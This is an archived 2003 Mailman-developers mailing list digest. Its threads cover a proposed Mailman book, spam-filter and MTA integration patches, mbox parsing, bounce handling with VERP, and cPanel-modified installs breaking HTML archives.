[mailto:mailman-announce-bounces+sensley=afo.net@python.org]On Behalf Of Martin Streicher Sent: Friday, November 07, 2003 1:44 PM To: mailman-announce@python.org Subject: [Mailman-Announce] A book on Mailman? Opinions, please. Dear Mailman Users: My name is Martin Streicher, and I am the Editor for Open Source books at Apress (http://www.apress.com). I am considering publishing a book on Mailman and would like to hear your opinions. Briefly, the book would be very focused on Mailman, would be about 150-200 pages, and would sell for less than $20. The book would be very hands-on, something you would keep in your lap and work through as you installed and configured Mailman with the MTA and web browser of your choice. Then the book would switch to a problem-solution section, useful for when you are troubleshooting or adding features to your configuration, or trying to help users manage their Mailman accounts. My questions: 1/ Is such a book needed, and what is it's potential? 2/ If it is needed, what information should it include? What problems come up time and again? 3/ Should it only be about Mailman, or should it include ezmlm, Mailman, and Majordomo? 4/ Finally, what other topics in system administration might fit this format -- short, project-oriented, solutions -- well? Thanks for your consideration and I look forward to your replies. Please send replies to martin@apress.com. I will post a summary of all replies so as to share the info, but not clutter the list in the interim. Martin _______________________________________________ Mailman-announce mailing list Mailman-announce@python.org http://mail.python.org/mailman/listinfo/mailman-announce Member address: sensley@afo.net Unsubscribe: http://mail.python.org/mailman/options/mailman-announce/sensley%40afo.net --- Incoming mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.537 / Virus Database: 332 - Release Date: 11/6/2003 --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.537 / Virus Database: 332 - Release Date: 11/6/2003 From joshr-garbage at joshr.com Fri Nov 7 16:38:30 2003 From: joshr-garbage at joshr.com (Josh Rabinowitz) Date: Thu Nov 13 11:57:59 2003 Subject: [Mailman-Developers] Re: [Mailman-Announce] A book on Mailman? Opinions, please. In-Reply-To: References: Message-ID: >Dear Mailman Users: > >My name is Martin Streicher, and I am the Editor for Open Source >books at Apress (http://www.apress.com). I am considering publishing >a book on Mailman and would like to hear your opinions. > >Briefly, the book would be very focused on Mailman, would be about >150-200 pages, and would sell for less than $20. The book would be >very hands-on, something you would keep in your lap and work through >as you installed and configured Mailman with the MTA and web browser >of your choice. Then the book would switch to a problem-solution >section, useful for when you are troubleshooting or adding features >to your configuration, or trying to help users manage their Mailman >accounts. > >My questions: > >1/ Is such a book needed, and what is it's potential? Yes it's needed. Potential? I have no idea. >2/ If it is needed, what information should it include? What >problems come up time and again? Initial installation with various mail servers. And more importantly, (or equally importantly), ow to change mail servers and upgrade versions of mailman. >3/ Should it only be about Mailman, or should it include ezmlm, >Mailman, and Majordomo? Just mailman. Who cares about those anyway? Majordomo sux. >4/ Finally, what other topics in system administration might fit >this format -- short, project-oriented, solutions -- well? That is a good question. I think an SSH cookbook might work. >Thanks for your consideration and I look forward to your replies. >Please send replies to martin@apress.com. I will post a summary of >all replies so as to share the info, but not clutter the list in the >interim. > >Martin > > >_______________________________________________ >Mailman-announce mailing list >Mailman-announce@python.org >http://mail.python.org/mailman/listinfo/mailman-announce >Member address: joshr-mailman@joshr.com >Unsubscribe: >http://mail.python.org/mailman/options/mailman-announce/joshr-mailman%40joshr.com From listuser at seifried.org Fri Nov 7 16:43:43 2003 From: listuser at seifried.org (Kurt Seifried) Date: Thu Nov 13 11:58:02 2003 Subject: [Mailman-Developers] Re: [Mailman-Announce] A book on Mailman? Opinions, please. References: Message-ID: <016001c3a578$3787c890$1400000a@bigdog> You may want to consider some basic performance tuning for sending large amounts of email and limited anti-spam to prevent lists being overwhelmed by crap (moderated or not). I would make it mailman specific, if it isn't you may as well call it "mailing lists". Kurt Seifried, kurt@seifried.org A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574 http://seifried.org/security/ ----- Original Message ----- From: "Martin Streicher" To: Sent: Friday, November 07, 2003 12:44 PM Subject: [Mailman-Announce] A book on Mailman? Opinions, please. > Dear Mailman Users: > > My name is Martin Streicher, and I am the Editor for Open Source books > at Apress (http://www.apress.com). I am considering publishing a book > on Mailman and would like to hear your opinions. > > Briefly, the book would be very focused on Mailman, would be about > 150-200 pages, and would sell for less than $20. The book would be very > hands-on, something you would keep in your lap and work through as you > installed and configured Mailman with the MTA and web browser of your > choice. Then the book would switch to a problem-solution section, > useful for when you are troubleshooting or adding features to your > configuration, or trying to help users manage their Mailman accounts. > > My questions: > > 1/ Is such a book needed, and what is it's potential? > > 2/ If it is needed, what information should it include? What problems > come up time and again? > > 3/ Should it only be about Mailman, or should it include ezmlm, > Mailman, and Majordomo? > > 4/ Finally, what other topics in system administration might fit this > format -- short, project-oriented, solutions -- well? > > Thanks for your consideration and I look forward to your replies. > Please send replies to martin@apress.com. I will post a summary of all > replies so as to share the info, but not clutter the list in the > interim. > > Martin > > > _______________________________________________ > Mailman-announce mailing list > Mailman-announce@python.org > http://mail.python.org/mailman/listinfo/mailman-announce > Member address: listuser@seifried.org > Unsubscribe: http://mail.python.org/mailman/options/mailman-announce/listuser%40seifried.org > From Deutscherverein at aol.com Sat Nov 8 14:12:56 2003 From: Deutscherverein at aol.com (Deutscherverein@aol.com) Date: Thu Nov 13 11:58:09 2003 Subject: [Mailman-Developers] Re: [Mailman-Announce] A book on Mailman? Opinions, please. Message-ID: <1aa.1c4c8004.2cde9a38@aol.com> DIE RECHNUNG FUER DIE CD BEI EBAY HABE ICH NOCH NICHT BEKOMMEN LE GOFF Francois 5 rue des CHALONNIERES 44400 REZE FRANKREICH From iane at sussex.ac.uk Mon Nov 10 05:24:15 2003 From: iane at sussex.ac.uk (Ian A B Eiloart) Date: Thu Nov 13 11:58:13 2003 Subject: [Mailman-Developers] Re: [Mailman-Announce] A book on Mailman? Opinions, please. In-Reply-To: References: Message-ID: <2147483647.1068459855@beeding.central.susx.ac.uk> --On Friday, November 7, 2003 11:44 am -0800 Martin Streicher wrote: > Dear Mailman Users: > > My name is Martin Streicher, and I am the Editor for Open Source books at > Apress (http://www.apress.com). I am considering publishing a book on > Mailman and would like to hear your opinions. > > Briefly, the book would be very focused on Mailman, would be about > 150-200 pages, and would sell for less than $20. The book would be very > hands-on, something you would keep in your lap and work through as you > installed and configured Mailman with the MTA and web browser of your > choice. Then the book would switch to a problem-solution section, useful > for when you are troubleshooting or adding features to your > configuration, or trying to help users manage their Mailman accounts. > > My questions: > > 1/ Is such a book needed, and what is it's potential? Probably not. It shouldn't be that hard to configure it. > 2/ If it is needed, what information should it include? What problems > come up time and again? > > 3/ Should it only be about Mailman, or should it include ezmlm, Mailman, > and Majordomo? Mailman only. No point in having a book covering mailing list managers that I don't use. However, a feature comparison might be useful. > 4/ Finally, what other topics in system administration might fit this > format -- short, project-oriented, solutions -- well? Examples > Thanks for your consideration and I look forward to your replies. Please > send replies to martin@apress.com. I will post a summary of all replies > so as to share the info, but not clutter the list in the interim. > > Martin > > > _______________________________________________ > Mailman-announce mailing list > Mailman-announce@python.org > http://mail.python.org/mailman/listinfo/mailman-announce > Member address: iane@sussex.ac.uk > Unsubscribe: > http://mail.python.org/mailman/options/mailman-announce/iane%40sussex.ac. > uk -- Ian Eiloart Servers Team Sussex University ITS From jeffw at chebucto.ns.ca Tue Nov 11 21:07:52 2003 From: jeffw at chebucto.ns.ca (Jeff Warnica) Date: Thu Nov 13 11:58:16 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. Message-ID: <1068602871.22989.38.camel@ron> ID 840426 This is different from the 'other' SA handler as it deals with pre-taged messages. IMHO this is far more likely to be the case in an ISP enviroment. The general concensious on my MTA's mailing list being that all mail should be tagged, flagged, and passed on leaving it up to 'something else' to decide what to do with spam (user agents could drop, or filter it, Mailman qualifies as a UA in this scheme :) The MailScanner install here might be using non-standard headers, but it shouldnt be too hard to figgure out what to change.. Thinking about it now I shold have put the header name and get-the-score RE as options, but oh well. From jeffw at chebucto.ns.ca Tue Nov 11 21:19:04 2003 From: jeffw at chebucto.ns.ca (Jeff Warnica) Date: Thu Nov 13 11:58:19 2003 Subject: [Mailman-Developers] Mailman / zmailer integration Message-ID: <1068603542.22989.50.camel@ron> sourceforge patch id: 840432 I may have posted it to the zmailer lsit before, but no harm in reminding people of my all around brilliance. A patch for ZMailers alias.cf file that allows for Mailman integration into this alternative, high performance, MTA in the same style as all the other MTA integration. The hack itself is more or less based on the zmailers built in list capabalities, so if its insecure, its someone elses fault :) From ig33528 at carrola.com Tue Nov 11 13:55:51 2003 From: ig33528 at carrola.com (Ricardo Manuel Carrola Simões) Date: Thu Nov 13 11:58:52 2003 Subject: [Mailman-Developers] Help! Message-ID: I'm developing a mailing list for academic purposes but i've a small problem! I would like to configure the return-path on the emails, to be diferent from the FROM field. Im using java(Sockets) and sendmail. Could you please help me!? -- Ricardo M.Carrola Sim?es www.carrola.com From barry at python.org Thu Nov 13 12:10:21 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 13 12:10:38 2003 Subject: [Mailman-Developers] Re: [Mailman-Announce] A book on Mailman? Opinions, please. In-Reply-To: <1aa.1c4c8004.2cde9a38@aol.com> References: <1aa.1c4c8004.2cde9a38@aol.com> Message-ID: <1068743421.3723.32.camel@anthem> On Sat, 2003-11-08 at 14:12, Deutscherverein@aol.com wrote: > DIE RECHNUNG FUER DIE CD BEI EBAY HABE ICH NOCH NICHT BEKOMMEN > LE GOFF Francois > 5 rue des CHALONNIERES > 44400 REZE > FRANKREICH Um, I didn't look at this message too closely when I approved it. Babelfish seems to indicate this may be spam. That's disturbing because it would mean the spammer was sufficiently savvy to fake a recent on-topic subject header. -Barry From r.barrett at openinfo.co.uk Thu Nov 13 12:46:35 2003 From: r.barrett at openinfo.co.uk (Richard Barrett) Date: Thu Nov 13 12:46:54 2003 Subject: [Mailman-Developers] Help! In-Reply-To: Message-ID: <52F6D24D-1601-11D8-927E-000A957C9A50@openinfo.co.uk> On Tuesday, November 11, 2003, at 06:55 pm, Ricardo Manuel Carrola Sim?es wrote: > I'm developing a mailing list for academic purposes but i've a small > problem! I would like to configure the return-path on the emails, to > be diferent from the FROM field. The discussion in the following posting to mailman-users list may aid you thoughts on this matter as regards to how Mailman does things: http://www.mail-archive.com/mailman-users@python.org/msg20277.html > Im using java(Sockets) What does that mean? > and sendmail. > Could you please help me!? > > -- > Ricardo M.Carrola Sim?es > www.carrola.com > ----------------------------------------------------------------------- Richard Barrett http://www.openinfo.co.uk From r.barrett at openinfo.co.uk Thu Nov 13 14:35:06 2003 From: r.barrett at openinfo.co.uk (Richard Barrett) Date: Thu Nov 13 14:35:23 2003 Subject: [Mailman-Developers] PortableUnixMailbox versus UnixMailbox as superclass for Mailman's Mailbox class Message-ID: <7BF7C3E4-1610-11D8-927E-000A957C9A50@openinfo.co.uk> Hello experts In MM 2.1.3, the Mailbox class defined in Mailman.Mailbox uses the standard Python class mailbox.PortableUnixMailbox as its superclass. This has caused me some grief with an unescaped 'From ...' line following a blank line in an mbox archive. The use of PortableUnixMailbox leads to a false splitting of this message when the mbox is being read by the next() function, with consequent failure in processing of the second, false, message. Having the mailbox.UnixMailbox class as the superclass of the Mailman Mailbox class prevents this problem. Can anyone tell me why MM's 2.1.3 code currently uses PortableUnixMailbox instead of UnixMailbox and what the downside is of my continuing to run my system with the modification to use UnixMailbox. Thanks in advance Richard ----------------------------------------------------------------------- Richard Barrett http://www.openinfo.co.uk From Martin at Cleaver.org Thu Nov 13 23:55:32 2003 From: Martin at Cleaver.org (Martin@Cleaver.org) Date: Thu Nov 13 23:55:55 2003 Subject: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? Message-ID: Hi Barry Ok, many thanks. Please see below for the full message. You'll note that I'd lost all the text from the message. I'll send you the password for the list in a separate message. Feel free to look or change the settings, and to create a new list for testing. All my lists have this problem so I am sure it is nothing that I have done wrong. I'm using Outlook XP 2002 SP-2, but my users (including Sean who sent that last message) may be using something different. Thanks and regards, Martin. On Tue, 2003-11-11 at 13:23, Martin@Cleaver.org wrote: > Nick / Barry > Can you please at least acknowledge whether this is a known problem? > Many Thanks, > Martin. > =My main complaint is that the archives don't work with HTML postings > =rendering the mailing list practically useless. = > =Here's a typical mailing: http://cp1.myhostdns.org/pipermail/social-announce-ft2004_mbssrc.com/2003-No vember/date.html > = > =Here's my postings to the cpanel site: > = * http://forums.cpanel.net/showthread.php?s=&threadid=15928 > = > =And I am not alone: > = * http://forums.cpanel.net/showthread.php?s=&threadid=13383 I'm sorry I can't get into the cpanel forums. But I did look at that Pipermail message (you need to follow the link to the one page that's in that date index). If I follow the link to the GIF image, it shows up just fine. Please note that the rendering of messages such as multipart/alternative are depending on list settings that I can't see, such as which content types to pass or scrub. I also haven't seen the original message so I don't know how what was posted matches against the filter_mime_types and pass_mime_types settings in the Content Filter section. There are also some site-wide settings which describe how to archive things like HTML messages, although I don't think that's what's happening here (it looks more like some unintended content-types are getting scrubbed out). I can't see any bugs, but your list may not be configured the way you want it for the types of messages being posted to it. -Barry -- Martin@Cleaver.org - +1 416 832 7759 Melbourne Business School FT 2004 MBA Exchange Participant to Rotman -----Original Message----- From: Sean Xi Yu WEN [mailto:x.wen@student.mbs.edu] Sent: Wednesday, 5 November 2003 12:22 AM To: Social-announce-ft2004@mbssrc.com Cc: Martin@Cleaver.org; Quan Zhang Subject: [Social-announce-ft2004] East Meets West Lunch Welcome to the launch of the East Meets West Lunch Club!! Our launch involves a delightful eastern lunch in the city this coming Monday, 10 November. Our aim is to meet monthly for lunch alternating between eastern and western themed restaurants. Please join us to explore the city and bridge the cultural gap. Monday's menu is set at $13 per person; including Chicken with Special Sauce, Sweet and Sour Pork and Beef with Vegetables, all served with vegetable fried rice. Save December 5 for our next meeting; location to be announced. Time: 1:30 p.m. Date: 10 November 2003 Place: Num Fong Chinese Restaurant 271 Swanston Street, CBD - Quan (Calvin) Zhang, Xi Yu (Sean) Wen, Mindy Frink and Lisa Stevenson (founding members) RSVP to x.xx @student.mbs.edu if you plan to join. See you there! Sean Xi Yu WEN MBA - Class of 2004 Melbourne Business School -------------- next part -------------- A non-text attachment was scrubbed... Name: winmail.dat Type: application/ms-tnef Size: 69687 bytes Desc: not available Url : http://mail.python.org/pipermail/mailman-developers/attachments/20031113/565284d3/winmail-0001.bin From maechler at stat.math.ethz.ch Fri Nov 14 03:05:48 2003 From: maechler at stat.math.ethz.ch (Martin Maechler) Date: Fri Nov 14 03:06:13 2003 Subject: [Mailman-Developers] Uncaught bounce notification .. In-Reply-To: <21715.1068559545@kanga.nu> References: <16304.45383.867489.358864@gargle.gargle.HOWL> <21715.1068559545@kanga.nu> Message-ID: <16308.36060.659955.861772@gargle.gargle.HOWL> >>>>> "J" == J C Lawrence >>>>> on Tue, 11 Nov 2003 09:05:45 -0500 writes: J> On Tue, 11 Nov 2003 10:52:07 +0100 J> Martin Maechler wrote: >> My problem is that I get about 50 "Uncaught bounce notification"s per >> day, only few of which are spam/virus related. J> Turn on VERP for a few days. J> -- J> J C Lawrence J> ---------(*) Satan, oscillate my metallic sonatas. J> claw@kanga.nu He lived as a devil, eh? J> http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. Thank you, "J", for the suggestion, but that seems not an option for two reasons 1) we (currenly must) use sendmail and that doesn't seem to support VERPing -- or at least we haven't found docu on that 2) VERP will probably cost quite a bit of CPU/memory/disk-IO resources on the mail servert. Currently that server almost constantly runs on load 2.5 -- 3 (because of anti-virus / anti-spam / mailman ..) ------ OTOH, most of these "uncaught bounce notification" can quite easily resolved by a human, i.e., the subscriber's e-mail can very often be found in the bounce. E.g., if they resend the full headers, I can find the proper subscriber's address in a "Received:" header such as Received: from hypatia.math.ethz.ch (root@hypatia.ethz.ch [129.132.58.23]) by cryforhelp.mr.itd.umich.edu (umich) with ESMTP id hAB7NrHc014893 for ; Tue, 11 Nov 2003 02:23:53 -0500 (hypatia is our own mail server) I.e., I think mailman's analysis of the bounce message leaves room for improvement. Can you tell me where in the python code this happens (so we might consider improving it here)? Best regards, and thank you all for mailman! Martin Maechler http://stat.ethz.ch/~maechler/ Seminar fuer Statistik, ETH-Zentrum LEO C16 Leonhardstr. 27 ETH (Federal Inst. Technology) 8092 Zurich SWITZERLAND phone: x-41-1-632-3408 fax: ...-1228 <>< From claw at kanga.nu Fri Nov 14 08:40:02 2003 From: claw at kanga.nu (J C Lawrence) Date: Fri Nov 14 08:40:08 2003 Subject: [Mailman-Developers] Uncaught bounce notification .. In-Reply-To: Message from Martin Maechler of "Fri, 14 Nov 2003 09:05:48 +0100." <16308.36060.659955.861772@gargle.gargle.HOWL> References: <16304.45383.867489.358864@gargle.gargle.HOWL> <21715.1068559545@kanga.nu> <16308.36060.659955.861772@gargle.gargle.HOWL> Message-ID: <10436.1068817202@kanga.nu> On Fri, 14 Nov 2003 09:05:48 +0100 Martin Maechler wrote: > "J" == J C Lawrence on Tue, 11 Nov 2003 09:05:45 > -0500 writes: >> On Tue, 11 Nov 2003 10:52:07 +0100 Martin Maechler >> wrote: >>> My problem is that I get about 50 "Uncaught bounce notification"s >>> per day, only few of which are spam/virus related. >> Turn on VERP for a few days. > 1) we (currenly must) use sendmail and that doesn't seem to support > VERPing -- or at least we haven't found docu on that Mailman's VERP supports don't require VERP support in the MTA, merely support for plus addressing. > 2) VERP will probably cost quite a bit of CPU/memory/disk-IO resources > on the mail servert. Currently that server almost constantly runs on > load 2.5 -- 3 (because of anti-virus / anti-spam / mailman ..) The added overhead is increased delivery expense in the form of more disk IO, both for the initial delivery from Mailman, and the final delivery to the target MX. The other overheads are fairly minimal given minor MTA tuning. -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. From Nigel.Metheringham at dev.InTechnology.co.uk Fri Nov 14 08:48:05 2003 From: Nigel.Metheringham at dev.InTechnology.co.uk (Nigel Metheringham) Date: Fri Nov 14 08:48:15 2003 Subject: [Mailman-Developers] Uncaught bounce notification .. In-Reply-To: <10436.1068817202@kanga.nu> References: <16304.45383.867489.358864@gargle.gargle.HOWL> <21715.1068559545@kanga.nu> <16308.36060.659955.861772@gargle.gargle.HOWL> <10436.1068817202@kanga.nu> Message-ID: <1068817685.18487.17.camel@angua.localnet> On Fri, 2003-11-14 at 13:40, J C Lawrence wrote: > On Fri, 14 Nov 2003 09:05:48 +0100 > Martin Maechler wrote: > > 2) VERP will probably cost quite a bit of CPU/memory/disk-IO resources > > on the mail servert. Currently that server almost constantly runs on > > load 2.5 -- 3 (because of anti-virus / anti-spam / mailman ..) > > The added overhead is increased delivery expense in the form of more > disk IO, both for the initial delivery from Mailman, and the final > delivery to the target MX. The other overheads are fairly minimal given > minor MTA tuning. Virus/Spam scanning should not be done for mail injection from mailman - its already been scanned when it came through the MTA on the way into mailman, so a second scan is completely superfluous and downright silly when you have expanded the original incoming message into a number of outgoing ones (even without VERP). Nigel. -- [ Nigel Metheringham Nigel.Metheringham@InTechnology.co.uk ] [ - Comments in this message are my own and not ITO opinion/policy - ] From bob at nleaudio.com Fri Nov 14 20:19:54 2003 From: bob at nleaudio.com (Bob Puff@NLE) Date: Fri Nov 14 20:20:06 2003 Subject: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? In-Reply-To: References: Message-ID: <20031115011954.M48910@nleaudio.com> The problem with cpanel is that it messes with the program configs in order to mould things into its proprietary setup. Once that way, its hard to mess with things, because they are not as they would normally be set up in a standard install. So in this example, the Mailman install is NOT the same as you would find on a webhost without cpanel. Its ok for people who just want to set up a server and let their users modify basic stuff, but its not for those who want to install custom software, or tweak stuff. I tried it on a box a while ago, and promptly reformatted after trying to figure out where they moved stuff, etc... Bob ---------- Original Message ----------- From: To: "'Barry Warsaw'" Sent: Thu, 13 Nov 2003 23:55:32 -0500 Subject: RE: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? > Hi Barry > > Ok, many thanks. Please see below for the full message. You'll note > that I'd lost all the text from the message. > > I'll send you the password for the list in a separate message. Feel > free to look or change the settings, and to create a new list for > testing. All my lists have this problem so I am sure it is nothing > that I have done wrong. > > I'm using Outlook XP 2002 SP-2, but my users (including Sean who > sent that last message) may be using something different. > > Thanks and regards, > Martin. > > > On Tue, 2003-11-11 at 13:23, Martin@Cleaver.org wrote: > > > Nick / Barry > > > Can you please at least acknowledge whether this is a known problem? > > > Many Thanks, > > > Martin. > > > =My main complaint is that the archives don't work with HTML postings > > > =rendering the mailing list practically useless. = > > > =Here's a typical mailing: > http://cp1.myhostdns.org/pipermail/social-announce- > ft2004_mbssrc.com/2003-No vember/date.html > > > = > > > =Here's my postings to the cpanel site: > > > = * > http://forums.cpanel.net/showthread.php?s=&threadid=15928 > > > = > > > =And I am not alone: > > > = * > http://forums.cpanel.net/showthread.php?s=&threadid=13383 > > I'm sorry I can't get into the cpanel forums. > > But I did look at that Pipermail message (you need to follow the > link to the one page that's in that date index). If I follow the > link to the GIF image, it shows up just fine. > > Please note that the rendering of messages such as > multipart/alternative are depending on list settings that I can't > see, such as which content types to pass or scrub. I also haven't > seen the original message so I don't know how what was posted > matches against the filter_mime_types and pass_mime_types settings > in the Content Filter section. There are also some site-wide > settings which describe how to archive things like HTML messages, > although I don't think that's what's happening here (it looks more > like some unintended content-types are getting scrubbed out). > > I can't see any bugs, but your list may not be configured the way > you want it for the types of messages being posted to it. > > -Barry > > -- > > Martin@Cleaver.org - +1 416 832 7759 > Melbourne Business School FT 2004 MBA Exchange Participant to Rotman > > > > > > -----Original Message----- > From: Sean Xi Yu WEN [mailto:x.wen@student.mbs.edu] > Sent: Wednesday, 5 November 2003 12:22 AM > To: Social-announce-ft2004@mbssrc.com > Cc: Martin@Cleaver.org; Quan Zhang > Subject: [Social-announce-ft2004] East Meets West Lunch > > > > Welcome to the launch of the East Meets West Lunch Club!! Our launch > involves a delightful eastern lunch in the city this coming Monday, > 10 November. Our aim is to meet monthly for lunch alternating > between eastern and western themed restaurants. > > Please join us to explore the city and bridge the cultural gap. > > > > Monday's menu is set at $13 per person; > > including Chicken with Special Sauce, Sweet and Sour Pork and Beef with > Vegetables, all served with vegetable fried rice. > > > > Save December 5 for our next meeting; location to be announced. > > > > Time: 1:30 p.m. > > Date: 10 November 2003 > > Place: Num Fong Chinese Restaurant > > 271 Swanston Street, CBD > > > > > > > > > > - Quan (Calvin) Zhang, Xi Yu (Sean) Wen, > > Mindy Frink and Lisa Stevenson (founding members) > > > > > > RSVP to x.xx @student.mbs.edu if > you plan to join. > > See you there! > > > > > > > > > > Sean Xi Yu WEN > > MBA - Class of 2004 > > Melbourne Business School ------- End of Original Message ------- From Martin at Cleaver.org Fri Nov 14 22:06:12 2003 From: Martin at Cleaver.org (Martin@Cleaver.org) Date: Fri Nov 14 22:06:29 2003 Subject: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? In-Reply-To: <20031115011954.M48910@nleaudio.com> Message-ID: Nick, Has Cpanel documented the changes they have made to Mailman? If not, can Cpanel supply the Mailman dev team with the scripts they use to mould it to fit? Cheers, Martin. -- Martin@Cleaver.org - +1 416 832 7759 Melbourne Business School FT 2004 MBA Exchange Participant to Rotman =-----Original Message----- =From: Bob Puff@NLE [mailto:bob@nleaudio.com] =Sent: Friday, 14 November 2003 8:20 PM =To: Martin@Cleaver.org; 'Barry Warsaw' =Cc: 'J. Nick Koston'; mailman-developers@python.org; serafin@eryxma.com =Subject: RE: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? = = =The problem with cpanel is that it messes with the program configs in order =to =mould things into its proprietary setup. Once that way, its hard to mess =with =things, because they are not as they would normally be set up in a standard =install. So in this example, the Mailman install is NOT the same as you =would =find on a webhost without cpanel. = =Its ok for people who just want to set up a server and let their users =modify =basic stuff, but its not for those who want to install custom software, or =tweak stuff. I tried it on a box a while ago, and promptly reformatted =after =trying to figure out where they moved stuff, etc... = =Bob = = =---------- Original Message ----------- =From: =To: "'Barry Warsaw'" =Sent: Thu, 13 Nov 2003 23:55:32 -0500 =Subject: RE: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? = => Hi Barry => => Ok, many thanks. Please see below for the full message. You'll note => that I'd lost all the text from the message. => => I'll send you the password for the list in a separate message. Feel => free to look or change the settings, and to create a new list for => testing. All my lists have this problem so I am sure it is nothing => that I have done wrong. => => I'm using Outlook XP 2002 SP-2, but my users (including Sean who => sent that last message) may be using something different. => => Thanks and regards, => Martin. => => => On Tue, 2003-11-11 at 13:23, Martin@Cleaver.org wrote: => => > Nick / Barry => => > Can you please at least acknowledge whether this is a known problem? => => > Many Thanks, => => > Martin. => => > =My main complaint is that the archives don't work with HTML postings => => > =rendering the mailing list practically useless. = => => > =Here's a typical mailing: => http://cp1.myhostdns.org/pipermail/social-announce- => ft2004_mbssrc.com/2003-No vember/date.html => => > = => => > =Here's my postings to the cpanel site: => => > = * => http://forums.cpanel.net/showthread.php?s=&threadid=15928 => => > = => => > =And I am not alone: => => > = * => http://forums.cpanel.net/showthread.php?s=&threadid=13383 => => I'm sorry I can't get into the cpanel forums. => => But I did look at that Pipermail message (you need to follow the => link to the one page that's in that date index). If I follow the => link to the GIF image, it shows up just fine. => => Please note that the rendering of messages such as => multipart/alternative are depending on list settings that I can't => see, such as which content types to pass or scrub. I also haven't => seen the original message so I don't know how what was posted => matches against the filter_mime_types and pass_mime_types settings => in the Content Filter section. There are also some site-wide => settings which describe how to archive things like HTML messages, => although I don't think that's what's happening here (it looks more => like some unintended content-types are getting scrubbed out). => => I can't see any bugs, but your list may not be configured the way => you want it for the types of messages being posted to it. => => -Barry => => -- => => Martin@Cleaver.org - +1 416 832 7759 => Melbourne Business School FT 2004 MBA Exchange Participant to Rotman => => => => => => -----Original Message----- => From: Sean Xi Yu WEN [mailto:x.wen@student.mbs.edu] => Sent: Wednesday, 5 November 2003 12:22 AM => To: Social-announce-ft2004@mbssrc.com => Cc: Martin@Cleaver.org; Quan Zhang => Subject: [Social-announce-ft2004] East Meets West Lunch => => => => Welcome to the launch of the East Meets West Lunch Club!! Our launch => involves a delightful eastern lunch in the city this coming Monday, => 10 November. Our aim is to meet monthly for lunch alternating => between eastern and western themed restaurants. => => Please join us to explore the city and bridge the cultural gap. => => => => Monday's menu is set at $13 per person; => => including Chicken with Special Sauce, Sweet and Sour Pork and Beef with => Vegetables, all served with vegetable fried rice. => => => => Save December 5 for our next meeting; location to be announced. => => => => Time: 1:30 p.m. => => Date: 10 November 2003 => => Place: Num Fong Chinese Restaurant => => 271 Swanston Street, CBD => => => => => => => => => => - Quan (Calvin) Zhang, Xi Yu (Sean) Wen, => => Mindy Frink and Lisa Stevenson (founding members) => => => => => => RSVP to x.xx @student.mbs.edu if => you plan to join. => => See you there! => => => => => => => => => => Sean Xi Yu WEN => => MBA - Class of 2004 => => Melbourne Business School =------- End of Original Message ------- From nick at cpanel.net Sat Nov 15 22:46:41 2003 From: nick at cpanel.net (J. Nick Koston) Date: Sat Nov 15 21:47:05 2003 Subject: Fwd: RE: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? In-Reply-To: <20031115152919.26555.qmail@web25208.mail.ukl.yahoo.com> References: <20031115152919.26555.qmail@web25208.mail.ukl.yahoo.com> Message-ID: <1068954401.2608.12.camel@localhost.localdomain> Martin, Just use this ip address to submit a ticket: 216.118.116.101 /Nick On Sat, 2003-11-15 at 10:29, Martin@Cleaver.org wrote: > Hi Barry, > > It seems this is the key - you need to open a cpanel account > and cpanel needs to treat the Mailman development team as a > "licensed cPanel customer". This will enable you to file support > requests and see the code that cpanel uses to mould mailman to > fit. > > I appreciate the need to register at the cpanel site. It keeps > the signal to noise ratio higher - and approval was quite rapid > for me. > > Note that I cannot request these scripts as I am an end user not > a cpanel registeree. Even if I could, the scripts would not mean > much to me. > > I just want my archives to work!!! > > Best regards and thanks to all, > Martin. > > --- "J. Nick Koston" wrote: > Subject: RE: > [Mailman-Developers] RE: [Mailman-Users] Mailman & > > CPanel? > > From: "J. Nick Koston" > > To: Martin@Cleaver.org > > Date: Sat, 15 Nov 2003 09:54:57 -0500 > > > > You can get a copy of any patches we have applied by supporting > > a ticket > > at http://support.cpanel.net > > > > On Fri, 2003-11-14 at 22:06, Martin@Cleaver.org wrote: > > > Nick, > > > Has Cpanel documented the changes they have made to > > Mailman? If not, can > > > Cpanel supply the Mailman dev team with the scripts they use > > to mould it to > > > fit? > > > Cheers, > > > Martin. > > > -- > > > Martin@Cleaver.org - +1 416 832 7759 > > > Melbourne Business School FT 2004 MBA Exchange Participant to > > Rotman > > > > > > > > > > > > =-----Original Message----- > > > =From: Bob Puff@NLE [mailto:bob@nleaudio.com] > > > =Sent: Friday, 14 November 2003 8:20 PM > > > =To: Martin@Cleaver.org; 'Barry Warsaw' > > > =Cc: 'J. Nick Koston'; mailman-developers@python.org; > > serafin@eryxma.com > > > =Subject: RE: [Mailman-Developers] RE: [Mailman-Users] > > Mailman & CPanel? > > > = > > > = > > > =The problem with cpanel is that it messes with the program > > configs in order > > > =to > > > =mould things into its proprietary setup. Once that way, its > > hard to mess > > > =with > > > =things, because they are not as they would normally be set > > up in a standard > > > =install. So in this example, the Mailman install is NOT the > > same as you > > > =would > > > =find on a webhost without cpanel. > > > = > > > =Its ok for people who just want to set up a server and let > > their users > > > =modify > > > =basic stuff, but its not for those who want to install > > custom software, or > > > =tweak stuff. I tried it on a box a while ago, and promptly > > reformatted > > > =after > > > =trying to figure out where they moved stuff, etc... > > > = > > > =Bob > > > = > > > = > > > =---------- Original Message ----------- > > > =From: > > > =To: "'Barry Warsaw'" > > > =Sent: Thu, 13 Nov 2003 23:55:32 -0500 > > > =Subject: RE: [Mailman-Developers] RE: [Mailman-Users] > > Mailman & CPanel? > > > = > > > => Hi Barry > > > => > > > => Ok, many thanks. Please see below for the full message. > > You'll note > > > => that I'd lost all the text from the message. > > > => > > > => I'll send you the password for the list in a separate > > message. Feel > 